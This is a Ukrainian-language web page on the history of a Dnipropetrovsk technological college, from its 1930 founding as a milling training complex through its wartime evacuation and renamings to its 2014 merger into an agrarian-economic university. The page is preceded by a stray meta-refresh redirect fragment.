http-equiv="Refresh" content="5; URL=http://www.t55555.at.ua"

Історія коледжу бере початок з 1930 року.

         У місті Павлограді було створено технікум, який у 1933 році був переведений у
м. Дніпропетровськ. Навчальний заклад називався «Борошномельно-круп’яний навчальний комбінат», до його складу входило школа ФЗН та мукомольно-елеваторний технікум.

         У такому вигляді навчальний заклад існував до 1936 року. У 30-ті роки було побудовано навчальний корпус, експериментальний млин, створені нові кабінети і лабораторії, шестиповерховий колишній млин був переобладнаний на гуртожиток.

 

         Першим директором навчального комбінату був Машкин М. Є., а з 1934 року – Мурзін М. М., який очолював наш навчальний заклад протягом 21 року.

         Велика Вітчизняна війна порушила розмірене життя технікуму. У серпні 1941 року почалася евакуація до Ташкенту.

         Після визволення Дніпропетровська у 1943 році - технікум, на початку 1944 року, повернувся з евакуації. Місцем тимчасового розташування була середня школа № 58 по вул. Фрунзе, тому що від гуртожитку та навчального корпусу залишилися тільки стіни.

         У 1939-1941 роках до лав Червоної Армії було мобілізовано майже 150 студентів і викладачів навчального закладу. Серед них Пелюх М. В., Бондарев П. Є., Попко Г. Г., Колесниченко М. Г., Плоский А. В., Піскунов І.П., Попов Г. Ф., Кіян П. Б.. Не повернулися з фронту колишні студенти Рижиків Яків, Крикунов Іван, Ковальчук Сергій, Руденко Андрій, Школа Любов та багато інших.

         За мужність і героїзм при форсуванні Дніпра двом випускникам технікуму Леву Борису Давидовичу та Мелашенко Миколі Євменовичу присвоєно  звання Героів Радянського Союзу.

         До 1947 року були відбудовані основні приміщення навчального закладу. Після війни відкрилися нові спеціальності та заочне відділення.

         У 1961 році навчальний заклад отримав назву «Дніпропетровський технологічний технікум».

         Новий етап у розвитку технікуму почався у 1997 році, коли він увійшов до складу навчально-науково-виробничого комплексу «Дніпропетровський державний аграрний університет».

         У новому тисячолітті навчальний заклад став коледжем.

         За роки існування у навчальному закладі змінилося 9 директорів, у різні роки працювало понад 200 викладачів. Значна кількість викладачів коледжу – колишні його випускники.

         За роки існування підготовлено понад 20 000 фахівців. Серед них 11 000 техників-технологів, 9 000 бухгалтерів та економістів. В Україні немає жодного підприємства галузі хлібопродуктів, де б не працювали випускники нашого навчального закладу.

         У січні 2014 року у зв’язку з утворенням Дніпропетровського державного аграрно-економічного університету коледж став його структурним підрозділом та отримав назву «Технологічний коледж Дніпропетровського державного аграрно-економічного університету».